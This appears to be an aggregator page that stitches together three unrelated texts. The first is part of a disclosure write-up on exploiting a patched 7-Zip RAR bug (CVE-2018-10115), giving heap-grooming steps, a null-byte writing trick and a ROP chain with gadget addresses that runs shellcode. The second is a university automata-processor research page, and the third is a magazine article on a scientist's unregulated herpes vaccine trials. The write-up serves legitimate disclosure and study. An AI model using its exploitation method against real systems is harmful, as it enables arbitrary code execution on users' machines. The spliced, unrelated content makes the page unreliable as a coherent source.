  1. Create around 18 pending allocations of all (relevant) sizes smaller than the Rar1 decoder object. This will activate LFH for these allocation sizes and prevent such small allocations from destroying our clean heap structure.
  2. Allocate the replacement object and free it, making sure it is surrounded by busy allocations (and hence not merged with other free chunks).
  3. Rar3 decoder is allocated (the replacement object is not reused, because the Rar3 decoder is larger than the Rar1 decoder).
  4. Rar1 decoder is allocated (reusing the replacement object).

Note that it is unavoidable to allocate some decoder before allocating that Rar1 decoder, because only this way the solidStart flag will be set to false and the next decoder will not be initialized correctly (see above).

If everything works as planned, the Rar1 decoder reuses our replacement object, and the Rar3 decoder object is placed with some constant offset after the Rar1 decoder object.

Allocating and Freeing on the Heap

Obviously, the above allocation strategy requires us to be able to make heap allocations in a reasonably controlled manner. Going through the whole code of the RAR handler, I could not find many good ways to make dynamic allocations on the default process heap that have attacker-controlled size and store attacker-controlled content. In fact, it seems that the only way to do such dynamic allocations is via the names of the archive’s items. Let us see how this works.

When an archive is opened, the method NArchive::NRar::CHandler::Open2 reads all items of the archive with the following code (simplified):

CItem item;for (;;)
{// some code omittedbool filled;
  archive.GetNextItem(item, getTextPassword, filled, error);// some more code omittedif (!filled) {// some more code omittedbreak;
  }if (item.IgnoreItem()) { continue; }bool needAdd = true;// some more code omitted  _items.Add(item);
}

The class CItem has a member variable Name of type AString, which stores the (ASCII) name of the corresponding item in a heap-allocated buffer.

Unfortunately, the name of an item is set as follows in NArchive::NRar::CInArchive::ReadName:

for (i = 0; i < nameSize && p[i] != 0; i++) {}
item.Name.SetFrom((constchar *)p, i);

I say unfortunately, because this means that we cannot write completely arbitrary bytes to the buffer. In particular, it seems that we cannot write null bytes. This is bad, because the replacement object we want to put on the heap requires a few zero bytes. So what can we do? Well, let us look at AString::SetFrom:

void AString::SetFrom(constchar *s, unsigned len)
{if (len > _limit)
  {char *newBuf = newchar[len + 1];delete []_chars;
    _chars = newBuf;
    _limit = len;
  }if (len != 0)
    memcpy(_chars, s, len);
  _chars[len] = 0;
  _len = len;
}

Okay, so this method will always terminate the string with a null byte. Moreover, we see that AString keeps the same underlying buffer, unless it is too small to hold the desired string. This gives rise to the following idea: Assume we want to write the hex-bytes DEAD00BEEF00BAAD00 to some heap-allocated buffer. Then we will just have an archive with items that have the following names (in the listed order):

  1. DEAD55BEEF55BAAD
  2. DEAD55BEEF
  3. DEAD

Basically, we let the method SetFrom write all null bytes we need. Note that we have replaced all null bytes in our data with some arbitrary non-zero byte (0x55 in this example), ensuring that the full string is written to the buffer.

This works reasonably well, and we can use this to write arbitrary sequences of bytes, with two small limitations. First, we have to end our sequence with a null byte. Second, we cannot have too many null bytes in our byte sequence, because this will cause a quadratic blow-up of the archive size. Luckily, we can easily work with those restrictions in our specific case.

Finally, note that we can make essentially two types of allocations:

  • Allocations with items such that item.IgnoreItem()==true. Those items will not be added to the list _items, and are hence only temporary. These allocations have the property that they will be freed eventually, and they can (using the above technique) be filled with almost arbitrary sequences of bytes. Since these allocations are all made via the same stack-allocated object item and hence use the same AString object, the allocation sizes of this type need to be strictly increasing in their size. We will use this allocation type mainly to put the replacement object on the heap.
  • Allocations with items such that item.IgnoreItem()==false. Those items will be added to the list _items, causing a copy of the corresponding name. This is useful in particular to cause many pending allocations of certain sizes in order to activate LFH. Note that the copied string cannot contain any null bytes, which is fine for our purposes.

Combining the outlined methods carefully, we can construct an archive that implements the heap allocation strategy from the previous section.

ROP

We leverage the lack of ASLR on the main executable 7zG.exe to bypass DEP with a ROP chain. 7-Zip never calls VirtualProtect, so we read the addresses of VirtualAlloc, memcpy, and exit from the Import Address Table to write the following ROP chain:

// pivot stack: xchg rax, rsp;exec_buffer = VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec_buffer, rsp+shellcode_offset, 0x1000);
jmp exec_buffer;
exit(0);

Since we are running on x86_64 (where most instructions have a longer encoding than in x86) and the binary is not very large, for some of the operations we want to execute there are no neat gadgets. This is not really a problem, but it makes the ROP chain somewhat ugly. For example, in order to set the register R9 to PAGE_EXECUTE_READWRITE before calling VirtualAlloc, we use the following chain of gadgets:

0x40691e, #pop rcx; add eax, 0xfc08500; xchg eax, ebp; ret; 
PAGE_EXECUTE_READWRITE, #value that is popped into rcx
0x401f52, #xor eax, eax; ret; (setting ZF=1 for cmove)
0x4193ad, #cmove r9, rcx; imul rax, rdx; xor edx, edx; imul rax, rax, 0xf4240; div r8; xor edx, edx; div r9; ret; 

Demo

The following demo video briefly presents the exploit running on a freshly installed and fully updated Windows 10 RS4 (Build 17134.1) 64-bit with 7-Zip 18.01 x64. As mentioned above, the targeted exploitation scenario is extraction via the context menu 7-Zip->Extract Here and 7-Zip->Extract to subfolder.

On Reliability

After some fine-tuning of the auxiliary heap allocation sizes, the exploit seems to work very reliably.

In order to obtain more information on reliability, I wrote a small script that repeatedly calls the binary 7zG.exe the same way it would be called when extracting the crafted archive via the context menu. Moreover, the script checks that calc.exe is actually started and the process 7zG.exe exits with code 0. Running the script on different Windows operating systems (all fully updated), the results are as follows:

  • Windows 10 RS4 (Build 17134.1) 64-bit: the exploit failed 17 out of 100 000 times.
  • Windows 8.1 64-bit: the exploit failed 12 out of 100 000 times.
  • Windows 7 SP1 64-bit: the exploit failed 90 out of 100 000 times.

Note that across all operating systems, the very same crafted archive is used. This works well, presumably because most changes between the Windows 7 and Windows 10 heap implementation affect the Low Fragmentation Heap, whereas the rest has not changed too much. Moreover, the LFH is still triggered for the same number of pending allocations.

Admittedly, it is not really possible to determine the reliability of an exploit empirically. Still, I believe this to be better than “I ran it a few times, and it seems to be reliable”.

Conclusion

In my opinion, this bug is a consequence of the design (partially) inherited from UnRAR. If a class depends on its clients to use it correctly in order to prevent usage of uninitialized class members, you are doomed for failure.

We have seen how this (at first glance) innocent looking bug can be turned into a reliable weaponized code execution exploit. Due to the lack of ASLR on the main executables, the only difficult part of the exploit was to carry out the heap massaging within the restricted context of RAR extraction.

Fortunately, the new 7-Zip 18.05 not only resolves the bug, but also comes with enabled ASLR on all the main executables.

Do you have any comments, feedback, doubts, or complaints? I would love to hear them. You can find my e-mail address on the about page.

Timeline of Disclosure

  • 2018-03-06 - Discovery
  • 2018-03-06 - Report
  • 2018-04-14 - MITRE assigned CVE-2018-10115
  • 2018-04-30 - 7-Zip 18.05 released, fixing CVE-2018-10115 and enabling ASLR on the executables.

Thanks & Acknowledgements

I would like to thank Igor Pavlov for fixing the bug and for enabling further exploitation mitigations in 7-Zip.

Virginia Engineering CAP Research

$
0
0

Reasearch Areas | Tools | Publications | White Papers

Our Research

The Center conducts fundamental research on foundations and applications of automata computing; the Automata Processor is a novel, massively parallel computational accelerator capable of 1-2 order-of-magnitude speedups within existing computer system form factors and power constraints.

The Center’s collaborative approach facilitates teaming and accelerates commercialization. Mission-driven agencies can partner with the Center to research how automata computing can address critical challenges, including NP-hard problems that are currently considered unsolvable. The Center’s partnership with UVa’s Applied Research Institute provides access to secure research facilities for conducting sensitive research and development. 

Research areas include:

  • algorithm development
  • hybrid computing
  • new programming languages
  • biomedical informatics
  • business/consumer informatics
  • cyber-security
  • entity resolution
  • graph analytics
  • heirarchical temporal memory
  • natural language processing

“As an emerging computer scientist and an early-career computer architecture researcher, I am thrilled to be working on Micron’s new Automata Processor (AP). The opportunity to be the first to benchmark, evaluate and develop applications for an industry-new technology is extraordinary.  I am drawn to the novelty of the AP’s unique MISD architecture.  We have already successfully demonstrated performance superiority of this new processor for certain class of applications.  I am very excited to continue my work exploring new capabilities for the AP.” – Jack Wadden, Graduate Research Assistant 

CAP Research Tools

MNCaRT - An open-source, multi-architecture automata processing ecosystem with Docker image.

VASIM - An Automata Simulator for the CPU.

ANMLZoo - Automata Benchmarks.

REAPR - A framework for accelerating automata on FPGAs.

DFAGE - A framework for accelerating DFAs on GPUs.

MNRL - JSON Automata Representation

AutomataToRouting - An open-source toolchain to design and evaluate island style spatial automata processing architectures. 

CAP Publications, Reports, and Presentations

Performance Evaluation of Regular Expression Matching Engines Across Different Computer Architectures - V. Dang, J. Wadden, M. El-Hadedy, X. Huang, K. Wang, M. Stan, and K. Skadron. SRC TechCon, Austin, TX, 2016 (TECHCON2016)

Entity resolution acceleration using Micron’s Automata Processor - C. Bo, K. Wang, J. Fox, and K. Skadron. SRC TechCon, Austin, TX, 2016 (TECHCON2016)

Sequential pattern mining with the Micron Automata Processor - K. Wang, E. Sadredini, K. Skadron.  ACM International Conference on Computing Frontiers (CF 2016)

RAPID Programming of Pattern-Recognition Processors - K. Angstadt, W. Weimer, and K. Skadron.  Proceedings of the ACM International Symposium on Architectural Support for Programming Languages and Operating Systems (ASPLOS 2016, to appear)

Brill Tagging on the Micron Automata Processor - K. Zhou, K. Wang, J. Fox, and D. Brown.  IEEE International Conference on Semantic Computing (ICSC 2015)

Entity Resolution using the Micron Automata Processor - C. Bo, K. Wang, J. Fox, and K. Skadron. 5th International Workshop on Architectures and Systems for Big Data (ASBD), in conjunction with the 42nd International Symposium on Computer Architecture (ISCA 2015).

Association Rule Mining with the Micron Automata Processor - K. Wang, M. Stan, and K. Skadron. 29th IEEE International Parallel & Distributed Processing Symposium (IPDPS 2015).

Generating efficient and high-quality pseudo-random behavior on Automata Processors - J.Wadden, N. Brunelle, K. Wang, M. El-Hadedy, G. Robins, M. Stan, and K. Skadron. 2016 IEEE 344th International Conference on Computer Design (ICCD16)

An Overview of Micron’s Automata Processor - K. Wang, K. Angstadt, C. Bo, N. Brunelle, E. Sadredini, T. Tracy II, J. Wadden, M. R. Stan, and K. Skadron. Proceedings of the International Conference on Hardware/Software Codesign and System Synthesis (CODES+ISSS), Oct. 2016.

Frequent Subtree Mining on the Automata Processor: Challenges and Opportunities - E. Sadredini, K. Wang, and K. Skadron. Proceedings of the ACM International Conference on Supercomputing (ICS), June 2017.

Automata-to-Routing: An Open-Source Toolchain for Design-Space Exploration of Spatial Automata Processing Architectures - J. Wadden, Samira Khan, and K. Skadron. Proceedings of the IEEE International Symposium on Field-Programmable Custom Computing Machines (FCCM), Apr. 2017.

MNRL and MNCaRT: An Open-Source, Multi-Architecture State Machine Research and Execution Ecosystem - K. Angstadt, J. P. Wadden, W. Weimer, and K. Skadron. Tech. Report CS-2017-01, Univ. of Virginia Dept. of Computer Science, May 2017

RAPID: Accelerating pattern search applications with reconfigurable hardware - K. Angstadt, J. Wadden, X. Huang, M. El-Hadedy, W. Weimer, and K. Skadron, SRC TechCon, Austin, TX, 2016 (TECHCON2016)

Toward machine learning on the Automata Processor - T. Tracy II, Y. Fu, I. Roy, E. Jonas, P. Glendenning. International Supercomputing Conference – High Performance Computing (ISC-HPC 2016).

Cellular Automata on the Micron Automata Processor - K. Wang and K. Skadron; University of Virginia Technical Report #CS-2015-03.

Nondeterministic Finite Automata in Hardware – the Case of the Levenshtein Automaton - T. Tracy, M. Stan, N. Brunelle, J. Wadden, K. Wang, K. Skadron, G. Robins. 5th International Workshop on Architectures and Systems for Big Data (ASBD), in conjunction with the 42nd International Symposium on Computer Architecture (ISCA 2015).

Regular expression acceleration on the micron automata processor: Brill tagging as a case study - Zhou et al;  IEEE International Conference on Big Data (Big Data 2015)

Fast Track Pattern Recognition in High Energy Physics Experiments with the Automata Processor - M. Wang, , G. Cancelo, C. Greena, D. Guo, K. Wang, and T. Zmuda. Nuclear Instruments and Methods in Physics Research Section A: Accelerators, Spectrometers, Detectors and Associated Equipment.

ANMLZoo: A benchmark Suite for exploring bottlenecks in Automata Processing engines and architectures - J. Wadden, V. Dang, N. Brunelle, T. Tracy, D. Guo, E. Sadredini, K. Wang, C. Bo, G. Robins, M. Stan, and K. Skadron. 2016 IEEE International Symposium on Workload Characterization (IISWC’16)

Feature Extraction and Image Retrieval on an Automata Structure - T. Ly, R. Sarkar, K. Skadron, and S. T. Acton. Proceedings of the 50th Asilomar Conference on Signals, Systems and Computers, Nov. 2016.

Entity Resolution Acceleration using Micron’s Automata Processor - C. Bo, K. Wang, J. Fox, and K. Skadron. Proceedings of the 2016 IEEE International Conference on Big Data (BigData), Dec. 2016.

Hierarchical Pattern Mining with the Micron Automata Processor - K. Wang, E. Sadredini, and K. Skadron. International Journal of Parallel Programming (IJPP), Jan. 2017.

Fast Searching for Potential gRNA Off-Target Sites for CRISPR/Cas9 using Automata Processing - C. Bo, E. Sadredini, and K. Skadron. SRC TechCon, Austin, TX, 2016 (TECHCON2017)

REAPR: Reconfigurable Engine for Automata Processing - T. Xie, V. Dang, J. Wadden, K. Skadron, and M. Stan. 27th International Conference on Field Programmable Logic and Applications (FPL 2017)  

CAP White Papers

Our group has demonstrated tremendous application potential using Micron’s Automata Processor. Below are some example application areas that may be of interest to industry partners and government sponsors. In addition to leading expertise on (and to date, exclusive access to) AP technology, our team also has extensive experience and expertise with hardware acceleration in general.

If you are a company or research lab, and are interested in exploring how the AP and other hardware acceleration technologies can be applied to meet your needs, please contact us and we will respond shortly; and if appropriate, we will be more than happy to develop a white paper to address your needs.

Cybersecurity

The AP’s massively parallel operation allows it to quickly check for prescribed patterns and their variations. This capability enables the AP to be uniquely suited for cybersecurity applications such as packet inspection and attribution. We believe there is a wide range of applications for AP technology in industry and national defense.

Data Reduction

The advent of Big Data brought unprecedented opportunities but also significant analytics challenges. The AP’s ability to quickly implement association rule mining (ARM) algorithms such as frequent itemset, sequential pattern mining, and frequent subtree mining can quickly identify relations and patterns in massive datasets. We also believe tremendously valuable insight can also be gained from open internet sources such as social media platforms. However, the volume, variety, velocity, and veracity challenges of internet open source data is a formidable challenge. The AP’s ability to speedup implementation of entity resolution (ER) can be leveraged to perform attribution on internet open source data. ARM and ER are a few examples of how we think the AP can be effectively applied for data reduction.

Approximate string matching/ Bioinformatics

Aligning DNA reads to a reference genome is a common and time consuming process. We have demonstrated significant speedups implementing DNA alignment on the AP. Furthermore, the AP’s NFA flexibility allows it to be very effective at tolerating variations (gaps, mutation, and insertions) in candidate patterns. This is capability is analogous to approximate string matching. That is, the AP is able to effectively match string patterns with varied edit distance. We envision many relevant research and industry applications based on this powerful capability.

CAP Home

A Dying Scientist and His Rogue Vaccine Trial

$
0
0

In a photo from 2009, Bill Halford, who was then 40 years old, looks like a schoolboy who hasn’t quite grown into his big ears. He wears an ill-fitting red shirt tucked into belted khakis; his jawline is square and his eyes are full of wonder. The picture was taken at Southern Illinois University, where he was a respected professor. A few years before, he had made a significant discovery—one that would determine the course of his life.

Halford, a microbiologist, had taken an interest in the peculiar nature of herpes—how it lies dormant in the nervous system and reactivates to cause disease. Herpes is one of the most pervasive viral infections in the world, sometimes causing painful genital blisters, and it has frustrated scientists attempting to find a cure. But in 2007, Halford realized that a weakened form of the virus he’d been studying might serve as a vaccine. He designed an experiment in which he inoculated mice with this variant, then exposed them to the wild-type form of the virus. In 2011 he published the results: Virtually all the mice survived. By contrast, animals that were not injected with his vaccine died in large numbers. It was promising science.

That same year, however, Halford became seriously ill. At first he thought he had a sinus infection, but it turned out to be a rare and aggressive form of cancer, sinonasal undifferentiated carcinoma. Halford was 42 years old at the time, with two teenage children. He underwent chemotherapy and radiation followed by surgery, but he was told that the form of cancer he had did not usually stay at bay for long. Halford had always been determined—“a 90-hours-a-week sort of researcher,” as his wife, Melanie Halford, puts it. The cancer diagnosis only seemed to harden his focus. Others had tried, and failed, to develop a herpes vaccine, but Halford was convinced that his method—using a live, attenuated form of the virus—would succeed. He would use whatever time he had left to show he was right.

The trouble was that the institutional gatekeepers of science—the agencies that fund research—didn’t view his work with the same urgency. He wasn’t getting the grants he thought he deserved. He felt “alone in the wilderness,” Melanie says, but also certain that his formula held unique promise. The question that drove him was not the practical “Will this work?” but rather an ethical one: “If I can help people suffering from herpes, isn’t it my duty to do so?” Melanie told me that “it was completely obvious to him what needed to be done.” Halford decided to barrel forward on his own unorthodox terms.

People with herpes who scoured the internet for research on their condition often discovered Halford’s scientific writing and blog posts, which combined technical information and a wry frustration with the status quo. Several readers reached out to Halford for help. A woman named Carolyn, who ran a private Facebook group devoted to genital herpes, approached him in 2012, and a few months later, Halford got back in touch and suggested they talk by phone. “That’s when he told me he had been fighting cancer and felt he needed to find out if the vaccine he developed could be therapeutic,” Carolyn recalls. In his animal research, Halford was testing whether his attenuated virus could prevent herpes, but scientists were also studying whether herpes vaccines could treat the disease. Carolyn suffered from debilitating nerve pain, and when Halford asked if she wanted to try the drug, she says, “I felt like I had hit the lottery.”

Carolyn suffered from debilitating nerve pain, and when Halford asked if she wanted to try the drug, she says, “I felt like I had hit the lottery.”

Through his blog and Carolyn’s Facebook group, Halford found other potential research subjects. He told them that the vaccine carried risks, as all vaccines do, but claimed that his formulation was “much safer” than those used for measles, mumps, polio, and chicken pox. Halford reassured the skeptical that he had tested his formula on himself, despite being weak from chemo, and had injected family members, and that they had “no side effects,” says Carolyn, who did not want to give her last name because of the stigma attached to ­herpes. Halford answered the potential volunteers’ questions by email and in long phone conversations. He sent at least one of them pictures of the large, red welts that were likely to develop on their calves around the injection site.

In August 2013, Carolyn drove six hours from Kentucky, where she lives, to Springfield, Illinois, where she had booked a room at the Holiday Inn Express. That evening, she and seven other volunteers, who had come from all over the country, gathered with Halford in one of the hotel rooms, where they sat on chairs, the couch, and the bed. “People were excited,” Carolyn recalls. Halford arrived with a box, which contained a tray and small vials, and began “mixing what appeared to be components of the vaccine right there,” Carolyn says. When her turn came, he took a sample of blood, then swabbed her calf with alcohol and drew a circle on the skin with a black felt-tip pen. Within the circle, he injected the mixture. A bump appeared, followed later by a welt.

In subsequent months, the volunteers gathered in Springfield twice more for injections. The Halfords invited them to their home for dinner. “We were telling Bill and his wife our stories, and they listened,” Carolyn says. “They are good people.”

As a seasoned researcher, Halford was certainly aware that his behavior violated ethical norms, and probably federal regulations as well. The Food and Drug Administration requires that researchers get permission before using an unapproved drug or agent on people in the United States, according to Hank Greely, an expert in biomedical ethics at Stanford Law School. Halford had not said a word to the agency about his plans, nor did he intend to say anything publicly. That “would be suicide,” he told participants in an email obtained by Kaiser Health News. Still, he believed that his brazen behavior would advance the cause of his vaccine; and in one sense, he was right.

Agustin Fernandez is a Hollywood film executive—Badge of Honor, a Martin Sheen drama, is his best known movie. Brash and gregarious with a bald head and, sometimes, a trim goatee, he splits his time between New York and Los Angeles. He also has an outsized fear of herpes. Years ago he started dating a woman with the virus. And at first he thought, “OK, what’s the big deal, you get a rash.” But over time he saw how she suffered during outbreaks and began to fear that he would become infected. “It just completely consumed me,” he says.

Fernandez threw himself into online research and, like Carolyn, soon came across Halford’s work. “I just made it my mission to meet him,” Fernandez says. Eventually, Fernandez persuaded Halford to fly to New York and join him for dinner at Frankies 570 Spuntino Italian restaurant. They talked for hours. “Bill probably still thought I was a crazy guy,” Fernandez says. “I was just on a very selfish mission.” Still, they met again in Chicago. Halford confided to Fernandez that he’d secretly tested the vaccine in humans and that a participant named Carolyn had not experienced herpes outbreaks since the injections and had even stopped taking antiviral medications. “I thought I’d found the holy grail,” Fernandez says.

To Fernandez, the next step seemed obvious: Start a company. Fernandez didn’t know much about scientific research, but he did know how to intrigue investors. He figured a herpes vaccine would be an easy sell, and more gratifying than raising money for a Hollywood movie. “It’s not like, ‘This is so great, Steven Seagal is going to punch a mummy in the face!’ This is like, ‘We can really change the world.’ ”

In 2015 Halford and Fernandez founded Rational Vaccines. Fernandez provided most of the initial money and then reached out to friends and family, raising a total of around $700,000. Halford cared mainly about intellectual control; he would oversee the science. The company also licensed a patent for Halford’s work from Southern Illinois University, where Halford remained a professor.

Halford started making plans for a clinical trial overseas, outside the jurisdiction of the FDA—a not uncommon strategy. He never seriously considered submitting plans to the agency, which would have required him to manufacture the vaccine in a standardized manner and comply with the FDA’s oversight and requirements. “It takes years and years,” Melanie says—years that Halford did not anticipate having.

CHAD WYS; Digital image courtesy of Getty’s Open Content Program

Pharmacological testing of any kind involves risks, and the standards for vaccine safety have evolved over time. Edward Jenner, the late-18th-century English scientist, demonstrated that he could protect an 8-year-old boy from smallpox by exposing him to a related virus called cowpox. It wasn’t until the 1950s, however, when the American virologist Jonas Salk developed a polio vaccine, that the modern era of mass inoculation began. Polio had left thousands of children paralyzed, and Salk’s vaccine is rightly viewed as a triumph of 20th-century science. At the same time, problems at one of the first production labs led to vaccine contamination that paralyzed 164 children and killed 10 others, a tragedy that might have been averted with better safety testing.

Improved oversight of drug development arrived in 1962 with the modernization of the FDA. In the wake of the thalidomide scandal, in which a drug to treat morning sickness was found to cause birth defects, the agency began requiring companies to complete three phases of clinical testing, demonstrating the safety and efficacy of their products. Scrutiny of vaccines increased too. In the early days, researchers typically tested vaccines on a few thousand people at a cost of several million dollars. Now they are expected to conduct trials with tens of thousands of subjects, with expenses in the hundreds of millions. Regulators also have strict requirements for ensuring the purity of products that will be tested in humans and tend to be cautious about side effects. “The bar has gotten much higher,” says Paul Offit, director of the Vaccine Education Center at Children’s Hospital of Philadelphia.

This can make it hard for small companies to develop vaccines, even when they report promising data. Last fall, Genocea, a small biotech firm, got as far as successful Phase II trial results for a herpes vaccine, but then the company announced that it was halting the effort. It lacked the capital to continue to the next phase of trials, which CEO Chip Clark says would have cost $150 million. (Genocea says it’s still looking to partner with a larger pharmaceutical company.) Given the FDA’s regulatory standards, some good vaccines surely don’t make it to market because the financial burdens are too great.

To Halford, however, any obstacle to his vaccine seemed an injustice. His cancer returned in early 2016, and this time “his doctors were out of good options,” Melanie says. Neither radiation nor surgery was feasible, so he was left with chemotherapy. Each month he received several days of grueling treatment, which left him nauseated and exhausted. Then he plunged into work again, conducting research and planning for a clinical trial on the Caribbean island of Saint Kitts, before starting the chemo cycle over again.

Halford began to recruit participants for the clinical trial through his personal blog. The desperation he found in the potential volunteers echoed the urgency of his own prognosis, and he was more responsive to their queries than many of their own doctors had been. A woman named Beth Erkelens, who lives in Colorado, learned about Halford’s work from a Google search that led to his blog. She called him about the clinical trial, and they talked, she says, “for like an hour.” At the time, Erkelens felt desperate. She was 45 years old and, for years, experienced nearly constant itching, as well as about 12 full-blown outbreaks a year. She felt she had nothing to lose and was swayed by Halford’s bold assurances, as well as his promise that Rational Vaccines would reimburse her for airfare and hotel for three trips to Saint Kitts. “It was his confidence that drew everyone in,” she says.

So when Halford sent Erkelens an informed-consent document laying out the potential risks of participation and noting that the trial would not include FDA oversight, she signed it without hesitation.

In June 2016, Erkelens arrived on the tiny island of Saint Kitts, which was quiet in the summer. Rational Vaccines had set up shop in a house high above a turquoise bay. One room became a makeshift medical office. There, Erkelens’ blood was drawn and her temperature taken. Then, as Halford looked on, a physician administered the injection. “We all had high hopes,” she recalls.

Initially, Erkelens’ only reaction was a walloping welt, which she had been told to expect and which seemed more of a curiosity to her than anything else. It was also a kind of badge. Before coming to Saint Kitts, Erkelens had avoided talking about her woes, except with potential partners. But on the island it was easy to spot other Americans who had also flown down for the clinical trial. “How do you miss another person with a giant red mark on the back of their leg when there’s no one else around?” In many ways, the trip felt like a group vacation.

Erkelens spent about five days on the island and recalls afternoons lounging on the beach, drinking beers at the bar, and exploring the island, where vervet monkeys ambled down from the hills. In the evenings, Fernandez sometimes paid for seafood dinners and drinks out of his own pocket. Participants had been flying to the island since March, receiving injections on a staggered schedule. Fernandez had been there for much of the time. When Erkelens returned home, she was already looking forward to her next island jaunt. She even planned to bring her 11-year-old son to Saint Kitts and stay between her second and third shots so he, too, could enjoy a “big, beachy vacation.”

In July, however, when Erkelens and her son arrived in Saint Kitts for her second shot, things did not go so well. This time she experienced an intense herpes outbreak after the injection, along with severe aches and pains, numbness and tingling in her arms and legs, shooting sensations, and “crazy, crazy shaking.” Halford had warned that she might feel flu-like symptoms, but this went far beyond that. By the time her symptoms started setting in, however, the other trial participants and researchers were leaving the island.

CHAD WYS; Digital image courtesy of Getty’s Open Content Program

A little more than a week later, Erkelens sent frantic messages to Halford telling him how sick she was. “That’s when he called me,” she says. “He was really angry,” insisting, she says, that the symptoms were caused not by the vaccine but by a mosquito-borne virus called chikungunya. But he called back and offered to discuss her symptoms. (Erkelens says she later tested negative for chikungunya.)

In early August, Erkelens called Halford in distress from Saint Kitts, where she had remained for several weeks. Halford was in Portland, Oregon. He had flown there to ask a herpes expert named Terri Warren to join the board of Rational Vaccines. Warren, who was trained as a nurse practitioner and ran a sexual-health clinic in Portland for decades, has served as an investigator on more than 100 clinical trials, mostly involving herpes. She and Halford had worked together previously, but as he sat at her kitchen counter and described the experiment already under way in Saint Kitts, she grew increasingly alarmed. “There were no protections for these people,” she says. “There was no one watching over the conduct of this trial.”

While US companies frequently pursue clinical research abroad, often to save money, they virtually never do so without oversight from some kind of institutional review board, which tries to ensure that the potential benefits of an experiment outweigh the risk to participants. IRBs review every aspect of a trial: the script researchers use to recruit participants, the entry criteria for the study, the wording of the informed consent document, the protocol for administering the drug or vaccine, rules for record keeping and reporting adverse events. These norms were established in response to historic abuses like the Tuskegee study, in which, over the course of 40 years, researchers observed how syphilis affected African American men without explaining fully what they were researching and failing to treat them even when an effective cure was found. Part of the idea of having a review board, though, is that even well-meaning researchers can lack perspective on their own work and require a third party to set them straight.

With mounting agitation, Warren grilled Halford on the kinds of issues an IRB might care about: Where did this vaccine come from? Who manufactured it? How was it shipped? How had he made sure that it was free from contaminants? Halford did not have satisfying answers. Warren also wanted to know how he had screened trial participants and was disturbed to learn that he had included people with two different strains of herpes virus, HSV-1 and HSV-2. The vaccine contained a live form of ­HSV-2, so the risks to individuals who only had HSV-1 were potentially higher. “I mean,” Warren told me, “what was he thinking?”

“There were no protections for these people. There was no one watching over the conduct of this trial ... I mean, what was he thinking?”

Compounding Warren’s concerns was Halford’s approach to data collection. He relied on questionnaires that participants filled out regarding their symptoms. Warren felt that the self-reports could potentially be influenced by a desire to please the researchers, especially since personal relationships had developed on an isolated island. “There was a lot of socializing with the investigators and the guy from Hollywood,” Warren says. “They’d sit around at the bar and drink and talk, and that’s just not appropriate.”

And then there was Halford’s casual approach to adverse events. When he admitted to Warren that some participants were having bad reactions to the vaccine, she asked, “Well, what are you going to do about that? How are you going to follow them?” His response, she says: “We removed them from the trial.” But that solves nothing, Warren told him. It leaves research subjects vulnerable and doesn’t answer crucial questions about the vaccine. “That’s not how you do it,” she told him. “You continue them in the trial and you follow them” because you want to know what the vaccine does.

Throughout the two-and-a-half-hour conversation, Warren felt she made little headway with Halford. “I wouldn’t describe him as belligerent, but he was not introspective in any way,” she says. “Just defensive.” She told him she wanted nothing to do with the clinical trial or the company. (Rational Vaccines declined to comment on Warren’s account.)

In early August, when Halford returned to Saint Kitts to oversee another round of injections, he asked Erkelens to meet him, Fernandez, and the doctor who administered the injections at a coffee shop. She still felt acutely ill, and as she approached the meeting with her son in tow, she was anxious that her symptoms would not be taken seriously. She also worried about letting Halford down, knowing how much he’d invested in the vaccine. Almost as soon as the conversation started, Erkelens says, Fernandez reminded her that she had signed a legal document acknowledging that the vaccine carried risks. It seemed her relationship with Rational Vaccines had shifted: “I was no longer their friend,” she says. “I was a foe.” (Fernandez denies that he brought up the informed-consent document and says that the company’s primary concern was to address Erkelens’ symptoms.)

Halford was not well. “He looked like he might throw up or pass out,” Erkelens says. At one point, she says, he shot her a sympathetic look and brought her and her son outside, where they could talk alone. As they walked along the road, in the direction of Erkelens’ hotel, Halford told her that he wanted to draw her blood again and try to understand why she’d become so ill; she could decide if she wanted the third injection. He had “a very big heart,” says Erkelens, who agreed to provide another blood sample. But she was afraid to continue with the vaccine. “I’m convinced the third shot would have killed me,” she says. “I felt like I was 100 years old.”

Halford’s cancer was taking an increasing toll. When Melanie picked him up at the airport in August, at the end of the clinical trial, he was seeing double and couldn’t drive. She later learned that he had a seizure in Saint Kitts but kept it from her, not wanting her to worry.

Racing against time, Halford wrote up the results of the Saint Kitts trial. He reported that 17 out of 20 subjects completed the three-injection series and described, on average, a “3.1-fold reduction in their frequency of herpes-symptomatic days.” For one participant, Halford also presented blood test results, which seemed to indicate a greater range of antibodies to the herpes virus after the vaccine than before. Nowhere in the manuscript did Halford provide data on the three participants who did not complete the trial, nor did he refer to adverse events beyond welts at the injection site.

When Halford submitted the manuscript to a peer-reviewed journal called Future Virology, the response was scorching. In reviews later obtained and posted online by Kaiser Health News, one scientist argued that “neither safety nor efficacy has been demonstrated by the data presented” and described the paper as “partly a vision, partly science, and partly wishful thinking.” The reviewers also came down hard on the lack of documented oversight: “Who is giving the immunizations in Saint Kitts and who is following them medically when they return to the US? Where is the clinical protocol based? Is this an end run around the FDA?” The manuscript was rejected.

CHAD WYS; Digital image courtesy of Getty’s Open Content Program

If Halford failed to win approval from academic peers, he struck gold with investors. Earlier that year, Fernandez says, an angel investor named Paul Bohm, who had cofounded a hackerspace called Metalab and had Silicon Valley ties, reached out to Rational Vaccines and offered to put the company in touch with venture capitalists. Drawing on these connections, Fernandez spent months pitching the research. In April 2017, at a symposium at Southern Illinois University, Halford stood in an auditorium and described the long arc of his research. A former managing director of Credit Suisse named Bart Madden was in the audience, and he was enthralled. “He’s got a patch on his eye, he can’t hear out of one ear, he’s all messed up, but he gets up there for 20 minutes,” Madden says. “I felt like I was watching history being made, just like the smallpox cure with [Edward] Jenner.” Madden later invested $750,000, Fernandez told me. (Bohm did not respond to requests for an interview, and Madden declined to confirm or comment on the size of his investment.)

Madden, who retired from Credit Suisse in 2003, is an author and policy adviser to the conservative-libertarian Heartland Institute. He focuses on market-based solutions to public policy issues. In 2010 he wrote a book called Free to Choose Medicine, which argues that the FDA’s risk-averse approach to drug approval gets in the way of innovation and keeps life-saving medicines off the market. He first heard about Halford in early 2017, when a documentary filmmaker contacted him for an interview about Halford’s research and free-to-choose medicine. In Madden’s eyes, Halford embodied the part of the brilliant outsider tangling with the scientific establishment.

